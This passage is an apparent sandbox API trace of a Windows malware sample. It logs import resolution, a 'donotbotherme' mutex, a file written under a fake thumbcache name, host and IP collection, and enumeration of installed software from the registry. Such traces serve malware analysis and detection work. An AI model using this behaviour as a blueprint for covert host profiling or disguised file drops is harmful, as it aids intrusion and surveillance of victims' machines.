(hModule=0x752a0000, lpProcName="isleadbyte") returned 0x752af76e [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="__mb_cur_max") returned 0x75343148 [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="mbtowc") returned 0x752aacdf [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="_amsg_exit") returned 0x7530b2ef [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="_initterm") returned 0x752ac151 [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="_XcptFilter") returned 0x752cdc75 [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="memcpy") returned 0x752a9910 [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="memset") returned 0x752a9790 [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="realloc") returned 0x752ab10d [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="_strdup") returned 0x752c47ad [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="_vsnprintf") returned 0x752ad1a8 [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="_findnext") returned 0x752f2cd6 [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="malloc") returned 0x752a9cee [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="free") returned 0x752a9894 [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="_findfirst") returned 0x752f2cc6 [0027.823] GetProcAddress (hModule=0x752a0000, lpProcName="strstr") returned 0x752ade4a [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="strncmp") returned 0x752ab443 [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="??_V@YAXPAX@Z") returned 0x752ab0f3 [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="??_U@YAPAXI@Z") returned 0x752ab100 [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="??2@YAPAXI@Z") returned 0x752ab0c9 [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="fclose") returned 0x752b3d79 [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="time") returned 0x752af708 [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="wcsncmp") returned 0x752ab05e [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="??3@YAXPAX@Z") returned 0x752ab0b9 [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="srand") returned 0x752af757 [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="rand") returned 0x752ac070 [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="wcsstr") returned 0x752abf71 [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="fgetws") returned 0x752bbe2b [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="_wfopen") returned 0x752bf3ac [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="_wtoi") returned 0x752ac823 [0027.824] GetProcAddress (hModule=0x752a0000, lpProcName="feof") returned 0x752bc9ea [0027.825] GetProcAddress (hModule=0x752a0000, lpProcName="_wcslwr") returned 0x752afb25 [0027.825] GetProcAddress (hModule=0x752a0000, lpProcName="_errno") returned 0x752aa5b8 [0027.825] GetProcAddress (hModule=0x752a0000, lpProcName="__CxxFrameHandler") returned 0x752c3495 [0027.825] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x759f0000 [0027.825] GetProcAddress (hModule=0x759f0000, lpProcName="WaitForSingleObject") returned 0x75a01136 [0027.825] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentProcess") returned 0x75a01809 [0027.825] GetProcAddress (hModule=0x759f0000, lpProcName="SetFilePointer") returned 0x75a017d1 [0027.825] GetProcAddress (hModule=0x759f0000, lpProcName="GetNativeSystemInfo") returned 0x75a110b5 [0027.825] GetProcAddress (hModule=0x759f0000, lpProcName="SetPriorityClass") returned 0x75a1cf28 [0027.825] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileSize") returned 0x75a0196e [0027.825] GetProcAddress (hModule=0x759f0000, lpProcName="CreateFileA") returned 0x75a053c6 [0027.825] GetProcAddress (hModule=0x759f0000, lpProcName="GetEnvironmentVariableW") returned 0x75a01b48 [0027.825] GetProcAddress (hModule=0x759f0000, lpProcName="ExitProcess") returned 0x75a07a10 [0027.825] GetProcAddress (hModule=0x759f0000, lpProcName="CloseHandle") returned 0x75a01410 [0027.825] GetProcAddress (hModule=0x759f0000, lpProcName="GetTickCount") returned 0x75a0110c [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="GetLocalTime") returned 0x75a05aa6 [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="WideCharToMultiByte") returned 0x75a0170d [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="GlobalFree") returned 0x75a05558 [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="GetLastError") returned 0x75a011c0 [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="MultiByteToWideChar") returned 0x75a0192e [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="GetPrivateProfileStringW") returned 0x75a0ea48 [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="LoadLibraryA") returned 0x75a049d7 [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="CreatePipe") returned 0x75a8415b [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="lstrcatW") returned 0x75a2828e [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="GetShortPathNameW") returned 0x75a0d2f9 [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentThread") returned 0x75a017ec [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="WriteFile") returned 0x75a01282 [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="Sleep") returned 0x75a010ff [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="CreateProcessA") returned 0x75a01072 [0027.826] GetProcAddress (hModule=0x759f0000, lpProcName="ReadFile") returned 0x75a03ed3 [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleFileNameW") returned 0x75a04950 [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="GetSystemDirectoryA") returned 0x75a1b66c [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="SetThreadPriority") returned 0x75a032bb [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="CreateDirectoryA") returned 0x75a2d526 [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="CreateMutexA") returned 0x75a04c6b [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="PeekNamedPipe") returned 0x75a84821 [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="GetSystemTimeAsFileTime") returned 0x75a03509 [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentProcessId") returned 0x75a011f8 [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentThreadId") returned 0x75a01450 [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="QueryPerformanceCounter") returned 0x75a01725 [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="SetUnhandledExceptionFilter") returned 0x75a087c9 [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="UnhandledExceptionFilter") returned 0x75a2772f [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="TerminateProcess") returned 0x75a1d802 [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="InterlockedCompareExchange") returned 0x75a01484 [0027.827] GetProcAddress (hModule=0x759f0000, lpProcName="InterlockedExchange") returned 0x75a01462 [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="RtlUnwind") returned 0x75a2d1c3 [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="OutputDebugStringA") returned 0x75a2b2b7 [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="SetEndOfFile") returned 0x75a1ce2e [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="CreateToolhelp32Snapshot") returned 0x75a2735f [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="Process32NextW") returned 0x75a2896c [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="GetSystemInfo") returned 0x75a049ca [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="GlobalMemoryStatusEx") returned 0x75a2d4c4 [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="IsWow64Process") returned 0x75a0195e [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="Process32FirstW") returned 0x75a28baf [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="GetTempPathW") returned 0x75a1d4dc [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleHandleW") returned 0x75a034b0 [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="GetLocaleInfoA") returned 0x75a1d5e5 [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="GetTempPathA") returned 0x75a2276c [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="DeleteFileA") returned 0x75a05444 [0027.828] GetProcAddress (hModule=0x759f0000, lpProcName="lstrcpyW") returned 0x75a23102 [0027.829] GetProcAddress (hModule=0x759f0000, lpProcName="DeleteFileW") returned 0x75a089b3 [0027.829] GetProcAddress (hModule=0x759f0000, lpProcName="GetProcAddress") returned 0x75a01222 [0027.829] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x756e0000 [0027.829] GetProcAddress (hModule=0x756e0000, lpProcName="RegEnumKeyW") returned 0x756f445b [0027.829] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756f468d [0027.829] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756f469d [0027.829] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExA") returned 0x756f48ef [0027.829] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExA") returned 0x756f4907 [0027.829] GetProcAddress (hModule=0x756e0000, lpProcName="RegDeleteValueA") returned 0x7570a4ea [0027.829] GetProcAddress (hModule=0x756e0000, lpProcName="ConvertSidToStringSidA") returned 0x7571192a [0027.829] GetProcAddress (hModule=0x756e0000, lpProcName="RegEnumKeyExA") returned 0x756f1481 [0027.829] GetProcAddress (hModule=0x756e0000, lpProcName="GetUserNameA") returned 0x7570a4b4 [0027.829] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExW") returned 0x756f46ad [0027.829] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x75c50000 [0027.829] GetProcAddress (hModule=0x75c50000, lpProcName="SHChangeNotify") returned 0x75ca7965 [0027.830] GetProcAddress (hModule=0x75c50000, lpProcName="ShellExecuteExW") returned 0x75c71e46 [0027.830] GetProcAddress (hModule=0x75c50000, lpProcName="SHGetSpecialFolderPathA") returned 0x75e9fb26 [0027.830] GetProcAddress (hModule=0x75c50000, lpProcName="SHGetSpecialFolderPathW") returned 0x75c70468 [0027.830] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x0 [0027.830] GetLastError () returned 0x7e [0027.830] LoadLibraryExA (lpLibFileName="WS2_32.dll", hFile=0x0, dwFlags=0x8) returned 0x75890000 [0027.986] GetProcAddress (hModule=0x75890000, lpProcName=0x39) returned 0x7589a05b [0027.986] GetProcAddress (hModule=0x75890000, lpProcName=0xc) returned 0x7589b131 [0027.986] GetProcAddress (hModule=0x75890000, lpProcName=0x73) returned 0x75893ab2 [0027.986] GetProcAddress (hModule=0x75890000, lpProcName=0xb) returned 0x7589311b [0027.986] GetProcAddress (hModule=0x75890000, lpProcName=0x34) returned 0x758a7673 [0027.986] GetProcAddress (hModule=0x75890000, lpProcName=0x74) returned 0x75893c5f [0027.986] GetModuleHandleA (lpModuleName="WINHTTP.dll") returned 0x0 [0027.986] GetLastError () returned 0x7e [0027.986] LoadLibraryExA (lpLibFileName="WINHTTP.dll", hFile=0x0, dwFlags=0x8) returned 0x74620000 [0028.419] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpSendRequest") returned 0x746279bd [0028.419] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpQueryAuthSchemes") returned 0x74654101 [0028.419] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpAddRequestHeaders") returned 0x74639dfb [0028.419] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpSetCredentials") returned 0x746545d7 [0028.419] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpReadData") returned 0x7462cb9e [0028.419] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpGetProxyForUrl") returned 0x7462d5dc [0028.419] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpQueryOption") returned 0x7463ec68 [0028.420] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpReceiveResponse") returned 0x7462b262 [0028.420] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpSetOption") returned 0x74623f6c [0028.420] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7463257e [0028.420] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpOpenRequest") returned 0x74624aea [0028.420] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpWriteData") returned 0x7463abfd [0028.420] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpConnect") returned 0x7462d9f5 [0028.420] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpOpen") returned 0x746258b9 [0028.420] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpCloseHandle") returned 0x74622c01 [0028.420] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpQueryHeaders") returned 0x7462ba51 [0028.420] GetProcAddress (hModule=0x74620000, lpProcName="WinHttpQueryDataAvailable") returned 0x7463c5dd [0028.420] GetModuleHandleA (lpModuleName="urlmon.dll") returned 0x76c40000 [0028.420] GetProcAddress (hModule=0x76c40000, lpProcName="UrlMkGetSessionOption") returned 0x76c69ed4 [0028.420] GetModuleHandleA (lpModuleName="iphlpapi.dll") returned 0x74c90000 [0028.421] GetProcAddress (hModule=0x74c90000, lpProcName="GetAdaptersInfo") returned 0x74c99263 [0028.421] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe2f650 | out: lpSystemTimeAsFileTime=0xe2f650*(dwLowDateTime=0x9e7eb00, dwHighDateTime=0x1d3949b)) [0028.421] GetCurrentProcessId () returned 0xae4 [0028.421] GetCurrentThreadId () returned 0xaf4 [0028.421] GetTickCount () returned 0x16b01 [0028.421] QueryPerformanceCounter (in: lpPerformanceCount=0xe2f648 | out: lpPerformanceCount=0xe2f648*=359797216) returned 1 [0028.421] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0xe2f2f8 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0028.422] GetLocalTime (in: lpSystemTime=0xe15710 | out: lpSystemTime=0xe15710*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x21, wMilliseconds=0x5b)) [0028.422] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fxsapidebuglogfile.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0028.422] time (in: timer=0x0 | out: timer=0x0) returned 0x5a67b9a5 [0028.422] srand (_Seed=0x5a67b9a5) [0028.425] UrlMkGetSessionOption (in: dwOption=0x10000001, pBuffer=0x7f2c40, dwBufferLength=0x104, pdwBufferLengthOut=0xe21f20, dwReserved=0x0 | out: pBuffer=0x7f2c40, pdwBufferLengthOut=0xe21f20) returned 0x8007000e [0028.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f2c40, cbMultiByte=-1, lpWideCharStr=0xe22685, cchWideChar=260 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)") returned 179 [0028.447] GetLocalTime (in: lpSystemTime=0xe21f48 | out: lpSystemTime=0xe21f48*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x21, wMilliseconds=0x7a)) [0028.447] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="donotbotherme") returned 0xbc [0028.447] GetLastError () returned 0x0 [0028.447] GetLocalTime (in: lpSystemTime=0xe151cc | out: lpSystemTime=0xe151cc*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x21, wMilliseconds=0x7a)) [0028.448] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fxsapidebuglogfile.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0028.448] GetLocalTime (in: lpSystemTime=0xe151c4 | out: lpSystemTime=0xe151c4*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x21, wMilliseconds=0x7a)) [0028.448] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fxsapidebuglogfile.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0028.448] GetLocalTime (in: lpSystemTime=0xe151bc | out: lpSystemTime=0xe151bc*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x21, wMilliseconds=0x7a)) [0028.448] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fxsapidebuglogfile.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0028.448] GetLocalTime (in: lpSystemTime=0xe151b4 | out: lpSystemTime=0xe151b4*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x21, wMilliseconds=0x7a)) [0028.449] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fxsapidebuglogfile.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0028.449] GetLocalTime (in: lpSystemTime=0xe151ac | out: lpSystemTime=0xe151ac*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x21, wMilliseconds=0x7a)) [0028.449] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fxsapidebuglogfile.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0028.449] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0xe2f1cf, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 1 [0028.450] CreateDirectoryA (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft"), lpSecurityAttributes=0x0) returned 0 [0028.450] CreateDirectoryA (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows"), lpSecurityAttributes=0x0) returned 0 [0028.450] CreateDirectoryA (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\explorer"), lpSecurityAttributes=0x0) returned 0 [0028.450] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1CD60.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1cd60.db"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0028.450] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1CD60.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1cd60.db"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc0 [0028.451] WriteFile (in: hFile=0xc0, lpBuffer=0xe21780*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0xe2177c, lpOverlapped=0x0 | out: lpBuffer=0xe21780*, lpNumberOfBytesWritten=0xe2177c*=0x269, lpOverlapped=0x0) returned 1 [0028.451] CloseHandle (hObject=0xc0) returned 1 [0028.452] GetAdaptersInfo (in: AdapterInfo=0x352398, SizePointer=0xe219e8 | out: AdapterInfo=0x352398, SizePointer=0xe219e8) returned 0x0 [0028.683] inet_addr (cp="") returned 0xffffffff [0028.690] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0xe21758 | out: lpWSAData=0xe21758) returned 0 [0028.693] gethostname (in: name=0xe218e8, namelen=256 | out: name="YKyd69q") returned 0 [0029.646] gethostbyname (name="YKyd69q") returned 0x484890*(h_name="YKyd69q", h_aliases=0x4848a0*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x4848a4*=([0]="192.168.0.170")) [0030.051] inet_ntoa (in=0xaa00a8c0) returned="192.168.0.170" [0030.054] WSACleanup () returned 0 [0030.169] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0xe21734 | out: Wow64Process=0xe21734) returned 1 [0030.169] GetNativeSystemInfo (in: lpSystemInfo=0xe216ec | out: lpSystemInfo=0xe216ec*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.169] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0xe2171c | out: phkResult=0xe2171c*=0x1a4) returned 0x0 [0030.169] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x0, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.169] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.169] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.169] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.169] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.169] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.169] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.169] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.169] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.169] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.169] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Adobe Flash Player Plugin", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.169] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Adobe Flash Player Plugin", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.169] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.169] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.169] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Adobe Flash Player Plugin", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.170] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.170] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.170] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Adobe Flash Player Plugin", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.170] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x41, lpcbData=0xe21700*=0x1d) returned 0x0 [0030.170] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.170] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Adobe Flash Player Plugin", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.170] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xc) returned 0x0 [0030.170] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.170] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x2, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.170] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Connection Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.170] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.171] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.171] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Connection Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.171] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.171] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.171] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x3, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, 